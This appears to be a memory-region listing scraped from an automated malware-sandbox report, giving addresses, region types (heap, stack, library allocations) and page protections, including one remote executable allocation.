209567B2000
|
heap
|
page read and write
|
||
2569DCC0000
|
heap
|
page read and write
|
||
209565D0000
|
heap
|
page read and write
|
||
1E2D5730000
|
heap
|
page execute and read and write
|
||
1EBC1D10000
|
heap
|
page read and write
|
||
7FF848BFC000
|
trusted library allocation
|
page execute and read and write
|
||
1D3943E1000
|
trusted library allocation
|
page read and write
|
||
7FF848D02000
|
trusted library allocation
|
page read and write
|
||
20A2A101000
|
trusted library allocation
|
page read and write
|
||
7FF848FB6000
|
trusted library allocation
|
page read and write
|
||
256B7ED3000
|
heap
|
page read and write
|
||
20970B20000
|
heap
|
page read and write
|
||
256AFD08000
|
trusted library allocation
|
page read and write
|
||
2079F77A000
|
trusted library allocation
|
page read and write
|
||
9E7000
|
stack
|
page read and write
|
||
7FF848C90000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848D42000
|
trusted library allocation
|
page read and write
|
||
F0107F7000
|
stack
|
page read and write
|
||
5734000
|
trusted library allocation
|
page read and write
|
||
1D3947B7000
|
trusted library allocation
|
page read and write
|
||
29C097E000
|
stack
|
page read and write
|
||
209566B0000
|
heap
|
page read and write
|
||
1E2ED752000
|
heap
|
page read and write
|
||
1F55AC2F000
|
heap
|
page read and write
|
||
207A79A0000
|
heap
|
page read and write
|
||
7FF848B80000
|
trusted library allocation
|
page read and write
|
||
1F5408A7000
|
heap
|
page read and write
|
||
2078FC05000
|
trusted library allocation
|
page read and write
|
||
1EBC1B2C000
|
heap
|
page read and write
|
||
1EBBFB50000
|
heap
|
page read and write
|
||
1D39479E000
|
trusted library allocation
|
page read and write
|
||
7FF848D40000
|
trusted library allocation
|
page read and write
|
||
5530000
|
heap
|
page read and write
|
||
7FF848D14000
|
trusted library allocation
|
page read and write
|
||
B87E3B6000
|
stack
|
page read and write
|
||
20F53FB4000
|
heap
|
page read and write
|
||
1F55A953000
|
heap
|
page read and write
|
||
7FF848DB0000
|
trusted library allocation
|
page read and write
|
||
E2B6EFE000
|
stack
|
page read and write
|
||
20A283AD000
|
heap
|
page read and write
|
||
20A2A9E8000
|
trusted library allocation
|
page read and write
|
||
20957FC5000
|
heap
|
page read and write
|
||
1D39122B000
|
heap
|
page read and write
|
||
2078F6E8000
|
trusted library allocation
|
page read and write
|
||
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
20F558F4000
|
heap
|
page read and write
|
||
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
7FF848DC0000
|
trusted library allocation
|
page read and write
|
||
20958E15000
|
trusted library allocation
|
page read and write
|
||
1EBBFEC5000
|
heap
|
page read and write
|
||
256A1827000
|
trusted library allocation
|
page read and write
|
||
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
2569FA7D000
|
trusted library allocation
|
page read and write
|
||
1D3AB3B2000
|
heap
|
page read and write
|
||
2078F660000
|
trusted library allocation
|
page read and write
|
||
7FF848D80000
|
trusted library allocation
|
page read and write
|
||
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
1D39128F000
|
heap
|
page read and write
|
||
2BF0000
|
heap
|
page read and write
|
||
2078FC5C000
|
trusted library allocation
|
page read and write
|
||
1430000
|
heap
|
page read and write
|
||
20958D8E000
|
trusted library allocation
|
page read and write
|
||
20F6DEF2000
|
heap
|
page read and write
|
||
2C0557A0000
|
heap
|
page read and write
|
||
20958650000
|
heap
|
page read and write
|
||
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
207A7834000
|
heap
|
page read and write
|
||
1E2D3770000
|
heap
|
page read and write
|
||
1446000
|
heap
|
page read and write
|
||
4EE9000
|
stack
|
page read and write
|
||
7FF848B43000
|
trusted library allocation
|
page execute and read and write
|
||
1F5436C7000
|
trusted library allocation
|
page read and write
|
||
1D3AB0DE000
|
heap
|
page read and write
|
||
7FF848C16000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848D02000
|
trusted library allocation
|
page read and write
|
||
7FF848B6D000
|
trusted library allocation
|
page execute and read and write
|
||
35525FF000
|
stack
|
page read and write
|
||
20A28290000
|
heap
|
page read and write
|
||
7FF848DD0000
|
trusted library allocation
|
page read and write
|
||
DBE3FFE000
|
stack
|
page read and write
|
||
4121000
|
trusted library allocation
|
page read and write
|
||
1E2D3847000
|
heap
|
page read and write
|
||
C8E000
|
stack
|
page read and write
|
||
1E2D3802000
|
heap
|
page read and write
|
||
DBE467A000
|
stack
|
page read and write
|
||
2078FF92000
|
trusted library allocation
|
page read and write
|
||
2078F7B7000
|
trusted library allocation
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
20A42535000
|
heap
|
page read and write
|
||
2569DD09000
|
heap
|
page read and write
|
||
21CAFD60000
|
heap
|
page read and write
|
||
CCE000
|
stack
|
page read and write
|
||
21CAFDA0000
|
heap
|
page read and write
|
||
1D392B42000
|
trusted library allocation
|
page read and write
|
||
209567E2000
|
heap
|
page read and write
|
||
2079F781000
|
trusted library allocation
|
page read and write
|
||
7F760000
|
trusted library allocation
|
page execute and read and write
|
||
1D39440D000
|
trusted library allocation
|
page read and write
|
||
1EBC1AA2000
|
heap
|
page read and write
|
||
209688F5000
|
trusted library allocation
|
page read and write
|
||
256A09AA000
|
trusted library allocation
|
page read and write
|
||
20958DD3000
|
trusted library allocation
|
page read and write
|
||
2078FFC1000
|
trusted library allocation
|
page read and write
|
||
2569F890000
|
heap
|
page execute and read and write
|
||
1F55AC40000
|
heap
|
page read and write
|
||
7FF848F33000
|
trusted library allocation
|
page read and write
|
||
DBE4477000
|
stack
|
page read and write
|
||
7A1239000
|
stack
|
page read and write
|
||
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
20F56732000
|
trusted library allocation
|
page read and write
|
||
20A2A9C0000
|
trusted library allocation
|
page read and write
|
||
20A28150000
|
heap
|
page read and write
|
||
1D3A2CD0000
|
trusted library allocation
|
page read and write
|
||
7FF848ED2000
|
trusted library allocation
|
page read and write
|
||
256AFA31000
|
trusted library allocation
|
page read and write
|
||
2079F6B0000
|
trusted library allocation
|
page read and write
|
||
1F543CB0000
|
trusted library allocation
|
page read and write
|
||
922CC8C000
|
stack
|
page read and write
|
||
2078D7E5000
|
heap
|
page read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
7FF848D80000
|
trusted library allocation
|
page read and write
|
||
20F65B71000
|
trusted library allocation
|
page read and write
|
||
256A0D07000
|
trusted library allocation
|
page read and write
|
||
7FF848CE1000
|
trusted library allocation
|
page read and write
|
||
58DE000
|
stack
|
page read and write
|
||
20A29D80000
|
heap
|
page execute and read and write
|
||
7FF848F90000
|
trusted library allocation
|
page execute and read and write
|
||
20A28460000
|
heap
|
page read and write
|
||
20A283D5000
|
heap
|
page read and write
|
||
1EBC1AC7000
|
heap
|
page read and write
|
||
1F55AD70000
|
trusted library allocation
|
page read and write
|
||
7FF848D1A000
|
trusted library allocation
|
page read and write
|
||
5500000
|
trusted library allocation
|
page execute and read and write
|
||
FEB000
|
stack
|
page read and write
|
||
1D3AB3D6000
|
heap
|
page read and write
|
||
7FF848C60000
|
trusted library allocation
|
page execute and read and write
|
||
20A2A21D000
|
trusted library allocation
|
page read and write
|
||
29C0F7E000
|
stack
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
1F543632000
|
trusted library allocation
|
page read and write
|
||
E2B678F000
|
stack
|
page read and write
|
||
BC4000
|
trusted library allocation
|
page read and write
|
||
7FF848C50000
|
trusted library allocation
|
page execute and read and write
|
||
20F53E3A000
|
heap
|
page read and write
|
||
DBE554E000
|
stack
|
page read and write
|
||
1E2D601C000
|
trusted library allocation
|
page read and write
|
||
1EBC1DC1000
|
heap
|
page read and write
|
||
20968939000
|
trusted library allocation
|
page read and write
|
||
1D39473A000
|
trusted library allocation
|
page read and write
|
||
B87E4BC000
|
stack
|
page read and write
|
||
7FF848DC0000
|
trusted library allocation
|
page read and write
|
||
B87E2F8000
|
stack
|
page read and write
|
||
7FF848D44000
|
trusted library allocation
|
page read and write
|
||
35521FE000
|
stack
|
page read and write
|
||
53AE000
|
stack
|
page read and write
|
||
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
20F55AC7000
|
heap
|
page execute and read and write
|
||
1EBC206D000
|
heap
|
page read and write
|
||
7A113F000
|
stack
|
page read and write
|
||
20A2A5DD000
|
trusted library allocation
|
page read and write
|
||
1E2D5710000
|
heap
|
page execute and read and write
|
||
256B7E9F000
|
heap
|
page read and write
|
||
20F53E2A000
|
heap
|
page read and write
|
||
2096891B000
|
trusted library allocation
|
page read and write
|
||
1F55A96C000
|
heap
|
page read and write
|
||
7FF848B74000
|
trusted library allocation
|
page read and write
|
||
B87E53E000
|
stack
|
page read and write
|
||
7A0BCE000
|
stack
|
page read and write
|
||
7FF848C2C000
|
trusted library allocation
|
page execute and read and write
|
||
20A3A195000
|
trusted library allocation
|
page read and write
|
||
DBE46F8000
|
stack
|
page read and write
|
||
1EBBFC7B000
|
heap
|
page read and write
|
||
2A7D000
|
stack
|
page read and write
|
||
1E2D5096000
|
heap
|
page read and write
|
||
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
20A2A14F000
|
trusted library allocation
|
page read and write
|
||
2C055760000
|
heap
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
1D394798000
|
trusted library allocation
|
page read and write
|
||
256A0DC2000
|
trusted library allocation
|
page read and write
|
||
1F5433D1000
|
trusted library allocation
|
page read and write
|
||
20958DAA000
|
trusted library allocation
|
page read and write
|
||
7FF848B5B000
|
trusted library allocation
|
page read and write
|
||
7FF848D54000
|
trusted library allocation
|
page read and write
|
||
20970B10000
|
heap
|
page execute and read and write
|
||
20956771000
|
heap
|
page read and write
|
||
20968941000
|
trusted library allocation
|
page read and write
|
||
1EBC1B2C000
|
heap
|
page read and write
|
||
1E2D5B85000
|
trusted library allocation
|
page read and write
|
||
F01154E000
|
stack
|
page read and write
|
||
7FF848C80000
|
trusted library allocation
|
page execute and read and write
|
||
1F55AE30000
|
heap
|
page read and write
|
||
1F55ACDB000
|
heap
|
page read and write
|
||
E2B6B7E000
|
stack
|
page read and write
|
||
7FF848EAC000
|
trusted library allocation
|
page read and write
|
||
1EBBFD33000
|
heap
|
page read and write
|
||
1D3A2EAF000
|
trusted library allocation
|
page read and write
|
||
1F540868000
|
heap
|
page read and write
|
||
1000000
|
trusted library allocation
|
page read and write
|
||
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
2569F8F0000
|
heap
|
page read and write
|
||
209708E1000
|
heap
|
page read and write
|
||
7FF848EA2000
|
trusted library allocation
|
page read and write
|
||
1D393247000
|
trusted library allocation
|
page read and write
|
||
256B7EE3000
|
heap
|
page read and write
|
||
7FF848D20000
|
trusted library allocation
|
page execute and read and write
|
||
1E2D3870000
|
heap
|
page read and write
|
||
1F542360000
|
trusted library allocation
|
page read and write
|
||
1EBC1D05000
|
heap
|
page read and write
|
||
1D3931AC000
|
trusted library allocation
|
page read and write
|
||
156F000
|
heap
|
page read and write
|
||
52FE000
|
stack
|
page read and write
|
||
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
1D3A2DFC000
|
trusted library allocation
|
page read and write
|
||
1780000
|
heap
|
page execute and read and write
|
||
2078FFEA000
|
trusted library allocation
|
page read and write
|
||
256B802A000
|
heap
|
page read and write
|
||
2078FBB3000
|
trusted library allocation
|
page read and write
|
||
2079F789000
|
trusted library allocation
|
page read and write
|
||
7FF848C1C000
|
trusted library allocation
|
page execute and read and write
|
||
1E2D5580000
|
heap
|
page read and write
|
||
1D392C78000
|
trusted library allocation
|
page read and write
|
||
1D3A2E98000
|
trusted library allocation
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
1D3AB610000
|
heap
|
page read and write
|
||
1D39438F000
|
trusted library allocation
|
page read and write
|
||
2078DA75000
|
heap
|
page read and write
|
||
FD0000
|
trusted library allocation
|
page read and write
|
||
1F55ACCF000
|
heap
|
page read and write
|
||
256A0776000
|
trusted library allocation
|
page read and write
|
||
56BF000
|
stack
|
page read and write
|
||
BD5747D000
|
stack
|
page read and write
|
||
7FF848D42000
|
trusted library allocation
|
page read and write
|
||
1F540A50000
|
heap
|
page read and write
|
||
1E2E57AF000
|
trusted library allocation
|
page read and write
|
||
20F55D32000
|
trusted library allocation
|
page read and write
|
||
922BAFE000
|
stack
|
page read and write
|
||
1F55AC7A000
|
heap
|
page read and write
|
||
1EBC1CEC000
|
heap
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
1D3A2E52000
|
trusted library allocation
|
page read and write
|
||
1F5434B4000
|
trusted library allocation
|
page read and write
|
||
1EBC1B2C000
|
heap
|
page read and write
|
||
5075000
|
trusted library allocation
|
page read and write
|
||
92A255D000
|
stack
|
page read and write
|
||
20F6DF60000
|
heap
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
2078D730000
|
heap
|
page read and write
|
||
2569F810000
|
heap
|
page read and write
|
||
2569DB20000
|
heap
|
page read and write
|
||
BD5712F000
|
stack
|
page read and write
|
||
286D000
|
trusted library allocation
|
page read and write
|
||
52BD000
|
stack
|
page read and write
|
||
1060000
|
heap
|
page read and write
|
||
1E2D5AA5000
|
trusted library allocation
|
page read and write
|
||
1E2D3800000
|
heap
|
page read and write
|
||
1EBC1B9E000
|
heap
|
page read and write
|
||
BD571EF000
|
stack
|
page read and write
|
||
20A28534000
|
heap
|
page read and write
|
||
20A28530000
|
heap
|
page read and write
|
||
5D20000
|
heap
|
page read and write
|
||
1F543BA4000
|
trusted library allocation
|
page read and write
|
||
20F6E059000
|
heap
|
page read and write
|
||
20A2A5E5000
|
trusted library allocation
|
page read and write
|
||
1D3A2E1F000
|
trusted library allocation
|
page read and write
|
||
207A7B0E000
|
heap
|
page read and write
|
||
7FF848BCC000
|
trusted library allocation
|
page execute and read and write
|
||
1EBBFC50000
|
heap
|
page read and write
|
||
53EE000
|
stack
|
page read and write
|
||
2078D970000
|
heap
|
page read and write
|
||
F01057D000
|
stack
|
page read and write
|
||
20958DFE000
|
trusted library allocation
|
page read and write
|
||
2078F7B4000
|
trusted library allocation
|
page read and write
|
||
1EBC1CEC000
|
heap
|
page read and write
|
||
2569DE94000
|
heap
|
page read and write
|
||
2078D7F1000
|
heap
|
page read and write
|
||
DBE48FE000
|
stack
|
page read and write
|
||
1D3911ED000
|
heap
|
page read and write
|
||
2078FC36000
|
trusted library allocation
|
page read and write
|
||
209567B0000
|
heap
|
page read and write
|
||
7FF848B33000
|
trusted library allocation
|
page execute and read and write
|
||
153B000
|
heap
|
page read and write
|
||
2569F92F000
|
heap
|
page read and write
|
||
C20000
|
heap
|
page read and write
|
||
1E2D5BC3000
|
trusted library allocation
|
page read and write
|
||
1E2D37BA000
|
heap
|
page read and write
|
||
DCD000
|
heap
|
page read and write
|
||
1EBC1F22000
|
heap
|
page read and write
|
||
1010000
|
trusted library allocation
|
page read and write
|
||
1EBC1FD8000
|
heap
|
page read and write
|
||
7FF848D28000
|
trusted library allocation
|
page read and write
|
||
1F54320B000
|
trusted library allocation
|
page read and write
|
||
29C0523000
|
stack
|
page read and write
|
||
1D3A2C76000
|
trusted library allocation
|
page read and write
|
||
1EBC1CFC000
|
heap
|
page read and write
|
||
7FF848CEA000
|
trusted library allocation
|
page read and write
|
||
7FF848D70000
|
trusted library allocation
|
page read and write
|
||
1527000
|
trusted library allocation
|
page execute and read and write
|
||
20F55AC0000
|
heap
|
page execute and read and write
|
||
1E2D384B000
|
heap
|
page read and write
|
||
20F56FC7000
|
trusted library allocation
|
page read and write
|
||
1D3AB270000
|
heap
|
page execute and read and write
|
||
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
285A000
|
trusted library allocation
|
page read and write
|
||
1E2D5AC6000
|
trusted library allocation
|
page read and write
|
||
20F53E4C000
|
heap
|
page read and write
|
||
7FF848C80000
|
trusted library allocation
|
page execute and read and write
|
||
29C05AE000
|
stack
|
page read and write
|
||
3120000
|
heap
|
page read and write
|
||
7FF848DC0000
|
trusted library allocation
|
page read and write
|
||
1E2D585E000
|
trusted library allocation
|
page read and write
|
||
1EBBFD27000
|
heap
|
page read and write
|
||
1EBC1FD4000
|
heap
|
page read and write
|
||
2078DA85000
|
heap
|
page read and write
|
||
FF0000
|
trusted library allocation
|
page execute and read and write
|
||
256AFA01000
|
trusted library allocation
|
page read and write
|
||
7FF848CF1000
|
trusted library allocation
|
page read and write
|
||
7FF848B9C000
|
trusted library allocation
|
page execute and read and write
|
||
2569FA01000
|
trusted library allocation
|
page read and write
|
||
1E2D5858000
|
trusted library allocation
|
page read and write
|
||
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
1D3A2C70000
|
trusted library allocation
|
page read and write
|
||
1D39326B000
|
trusted library allocation
|
page read and write
|
||
7FF848B63000
|
trusted library allocation
|
page execute and read and write
|
||
1F552441000
|
trusted library allocation
|
page read and write
|
||
922BF38000
|
stack
|
page read and write
|
||
20A2A623000
|
trusted library allocation
|
page read and write
|
||
209708B2000
|
heap
|
page read and write
|
||
20958850000
|
heap
|
page execute and read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
20F55B87000
|
trusted library allocation
|
page read and write
|
||
E2B7B0E000
|
stack
|
page read and write
|
||
256A128F000
|
trusted library allocation
|
page read and write
|
||
1EBC1AA0000
|
heap
|
page read and write
|
||
2078FBFD000
|
trusted library allocation
|
page read and write
|
||
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
7FF848EDC000
|
trusted library allocation
|
page read and write
|
||
7FF848BF0000
|
trusted library allocation
|
page read and write
|
||
7FF848D12000
|
trusted library allocation
|
page read and write
|
||
20A3A1E1000
|
trusted library allocation
|
page read and write
|
||
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
1F540A70000
|
heap
|
page read and write
|
||
30BD000
|
stack
|
page read and write
|
||
305F000
|
stack
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
1EBC1D10000
|
heap
|
page read and write
|
||
2CE0000
|
heap
|
page read and write
|
||
2569DCCA000
|
heap
|
page read and write
|
||
7FF848BE6000
|
trusted library allocation
|
page read and write
|
||
2095914F000
|
trusted library allocation
|
page read and write
|
||
2872000
|
trusted library allocation
|
page read and write
|
||
1D3AB380000
|
heap
|
page read and write
|
||
5D8E000
|
stack
|
page read and write
|
||
20A2A606000
|
trusted library allocation
|
page read and write
|
||
20A42330000
|
heap
|
page execute and read and write
|
||
7FF848D20000
|
trusted library allocation
|
page execute and read and write
|
||
20959182000
|
trusted library allocation
|
page read and write
|
||
20958DC5000
|
trusted library allocation
|
page read and write
|
||
7FF848DA0000
|
trusted library allocation
|
page read and write
|
||
2569DCDE000
|
heap
|
page read and write
|
||
20970B86000
|
heap
|
page read and write
|
||
1F540C44000
|
heap
|
page read and write
|
||
7FF848DA0000
|
trusted library allocation
|
page read and write
|
||
20959153000
|
trusted library allocation
|
page read and write
|
||
7FF848B4B000
|
trusted library allocation
|
page read and write
|
||
209567D6000
|
heap
|
page read and write
|
||
1F55ABA3000
|
heap
|
page read and write
|
||
20F5590B000
|
heap
|
page read and write
|
||
533E000
|
stack
|
page read and write
|
||
7FF848B33000
|
trusted library allocation
|
page execute and read and write
|
||
20A2A65F000
|
trusted library allocation
|
page read and write
|
||
20958D7B000
|
trusted library allocation
|
page read and write
|
||
1E2ED79D000
|
heap
|
page read and write
|
||
1F54089D000
|
heap
|
page read and write
|
||
7FF848D60000
|
trusted library allocation
|
page read and write
|
||
5370000
|
heap
|
page execute and read and write
|
||
7FF848CF0000
|
trusted library allocation
|
page execute and read and write
|
||
1D39322F000
|
trusted library allocation
|
page read and write
|
||
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
2AE0000
|
trusted library allocation
|
page read and write
|
||
7FF848B50000
|
trusted library allocation
|
page read and write
|
||
20958DBD000
|
trusted library allocation
|
page read and write
|
||
1EBBFC59000
|
heap
|
page read and write
|
||
20958D29000
|
trusted library allocation
|
page read and write
|
||
7FF848D80000
|
trusted library allocation
|
page read and write
|
||
1500000
|
trusted library allocation
|
page read and write
|
||
20A424B0000
|
heap
|
page read and write
|
||
7FF848CD2000
|
trusted library allocation
|
page read and write
|
||
BB0000
|
trusted library allocation
|
page read and write
|
||
4E6F000
|
stack
|
page read and write
|
||
7A0E7E000
|
stack
|
page read and write
|
||
5FEB000
|
stack
|
page read and write
|
||
DBE534E000
|
stack
|
page read and write
|
||
7FF848BEC000
|
trusted library allocation
|
page execute and read and write
|
||
256B7EAF000
|
heap
|
page read and write
|
||
7FF848DB0000
|
trusted library allocation
|
page read and write
|
||
256B8015000
|
heap
|
page read and write
|
||
1D3AB18C000
|
heap
|
page read and write
|
||
DBE3FBF000
|
unkown
|
page read and write
|
||
1EBBFD1A000
|
heap
|
page read and write
|
||
20A2A626000
|
trusted library allocation
|
page read and write
|
||
6EC0000
|
heap
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
256A1802000
|
trusted library allocation
|
page read and write
|
||
256B7EA8000
|
heap
|
page read and write
|
||
104E000
|
stack
|
page read and write
|
||
1E2D381B000
|
heap
|
page read and write
|
||
BC0000
|
trusted library allocation
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
2078FC4C000
|
trusted library allocation
|
page read and write
|
||
20958D5E000
|
trusted library allocation
|
page read and write
|
||
1F540860000
|
heap
|
page read and write
|
||
20A2A14A000
|
trusted library allocation
|
page read and write
|
||
207A7ACC000
|
heap
|
page read and write
|
||
5749000
|
trusted library allocation
|
page read and write
|
||
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
7FF848B64000
|
trusted library allocation
|
page read and write
|
||
256AFCF8000
|
trusted library allocation
|
page read and write
|
||
14DE000
|
stack
|
page read and write
|
||
7FF848D66000
|
trusted library allocation
|
page read and write
|
||
256A0CA6000
|
trusted library allocation
|
page read and write
|
||
E1A000
|
heap
|
page read and write
|
||
20A2A260000
|
trusted library allocation
|
page read and write
|
||
5701000
|
trusted library allocation
|
page read and write
|
||
2078F7B1000
|
trusted library allocation
|
page read and write
|
||
B87F0CE000
|
stack
|
page read and write
|
||
29C0AFE000
|
stack
|
page read and write
|
||
4F06000
|
trusted library allocation
|
page read and write
|
||
256A0ABE000
|
trusted library allocation
|
page read and write
|
||
1D3911E3000
|
heap
|
page read and write
|
||
1EBBFEC0000
|
heap
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
7FF848D60000
|
trusted library allocation
|
page read and write
|
||
2078F690000
|
heap
|
page execute and read and write
|
||
1E2ED82A000
|
heap
|
page read and write
|
||
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
20A42293000
|
heap
|
page read and write
|
||
7FF848D70000
|
trusted library allocation
|
page read and write
|
||
922BB79000
|
stack
|
page read and write
|
||
20958E05000
|
trusted library allocation
|
page read and write
|
||
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
1E2D5793000
|
trusted library allocation
|
page read and write
|
||
7FF848DD0000
|
trusted library allocation
|
page read and write
|
||
207A7CB0000
|
heap
|
page execute and read and write
|
||
20958590000
|
trusted library allocation
|
page read and write
|
||
2078D7BD000
|
heap
|
page read and write
|
||
2852000
|
trusted library allocation
|
page read and write
|
||
BD5797F000
|
stack
|
page read and write
|
||
7FF848B44000
|
trusted library allocation
|
page read and write
|
||
1F543580000
|
trusted library allocation
|
page read and write
|
||
7A153C000
|
stack
|
page read and write
|
||
5760000
|
trusted library allocation
|
page read and write
|
||
283E000
|
stack
|
page read and write
|
||
1EBC1B2A000
|
heap
|
page read and write
|
||
7FF848ED8000
|
trusted library allocation
|
page read and write
|
||
1F542354000
|
heap
|
page read and write
|
||
20956728000
|
heap
|
page read and write
|
||
7FF848D21000
|
trusted library allocation
|
page read and write
|
||
7FF848E7A000
|
trusted library allocation
|
page read and write
|
||
20F57734000
|
trusted library allocation
|
page read and write
|
||
1EBC1B2C000
|
heap
|
page read and write
|
||
2AD4000
|
trusted library allocation
|
page read and write
|
||
2569F9F0000
|
heap
|
page read and write
|
||
20F53DF0000
|
heap
|
page read and write
|
||
256AFA70000
|
trusted library allocation
|
page read and write
|
||
1F542290000
|
trusted library section
|
page read and write
|
||
20958CE4000
|
trusted library allocation
|
page read and write
|
||
2078FC32000
|
trusted library allocation
|
page read and write
|
||
209567F3000
|
heap
|
page read and write
|
||
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
2078D7EB000
|
heap
|
page read and write
|
||
F0109FE000
|
stack
|
page read and write
|
||
7FF848B64000
|
trusted library allocation
|
page read and write
|
||
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
2D0F000
|
trusted library allocation
|
page read and write
|
||
C40000
|
heap
|
page read and write
|
||
1D391060000
|
heap
|
page read and write
|
||
20958DCF000
|
trusted library allocation
|
page read and write
|
||
7FF848C20000
|
trusted library allocation
|
page read and write
|
||
2569F937000
|
heap
|
page read and write
|
||
7A0EFD000
|
stack
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
7FF848D00000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848DA0000
|
trusted library allocation
|
page read and write
|
||
7FF848B6D000
|
trusted library allocation
|
page execute and read and write
|
||
2078FA52000
|
trusted library allocation
|
page read and write
|
||
F010779000
|
stack
|
page read and write
|
||
7A133E000
|
stack
|
page read and write
|
||
2079F753000
|
trusted library allocation
|
page read and write
|
||
20958FB2000
|
trusted library allocation
|
page read and write
|
||
DD2000
|
heap
|
page read and write
|
||
1F5422A0000
|
trusted library allocation
|
page read and write
|
||
7FF848C50000
|
trusted library allocation
|
page execute and read and write
|
||
1F540970000
|
heap
|
page read and write
|
||
7FF848C26000
|
trusted library allocation
|
page read and write
|
||
DBE427F000
|
stack
|
page read and write
|
||
1E2D5430000
|
heap
|
page readonly
|
||
1EBC1FD4000
|
heap
|
page read and write
|
||
7FF848B72000
|
trusted library allocation
|
page read and write
|
||
1EBC1CC3000
|
heap
|
page read and write
|
||
20958DD7000
|
trusted library allocation
|
page read and write
|
||
1E2D37C2000
|
heap
|
page read and write
|
||
BD5787E000
|
stack
|
page read and write
|
||
20A28470000
|
trusted library allocation
|
page read and write
|
||
2078DA80000
|
heap
|
page read and write
|
||
1F542410000
|
heap
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
1EBC1B5E000
|
heap
|
page read and write
|
||
7FF848B62000
|
trusted library allocation
|
page read and write
|
||
20A284D0000
|
heap
|
page read and write
|
||
20F5766E000
|
trusted library allocation
|
page read and write
|
||
20958D96000
|
trusted library allocation
|
page read and write
|
||
1EBC1F22000
|
heap
|
page read and write
|
||
7FF848EC9000
|
trusted library allocation
|
page read and write
|
||
E2B6DF6000
|
stack
|
page read and write
|
||
1EBC1B9E000
|
heap
|
page read and write
|
||
7FF848D44000
|
trusted library allocation
|
page read and write
|
||
922B7DE000
|
unkown
|
page read and write
|
||
5E90000
|
trusted library allocation
|
page read and write
|
||
7FF848CE0000
|
trusted library allocation
|
page read and write
|
||
20A2A648000
|
trusted library allocation
|
page read and write
|
||
922BD79000
|
stack
|
page read and write
|
||
2078D6C0000
|
heap
|
page read and write
|
||
50B0000
|
heap
|
page read and write
|
||
1EBC1AE8000
|
heap
|
page read and write
|
||
BD570A5000
|
stack
|
page read and write
|
||
1EBC1B4E000
|
heap
|
page read and write
|
||
1F55A8B9000
|
heap
|
page read and write
|
||
922C13F000
|
stack
|
page read and write
|
||
1D3911C0000
|
heap
|
page read and write
|
||
20A3A110000
|
trusted library allocation
|
page read and write
|
||
1EBC1CF1000
|
heap
|
page read and write
|
||
20A28480000
|
heap
|
page readonly
|
There are 1715 hidden memdumps, click here to show them.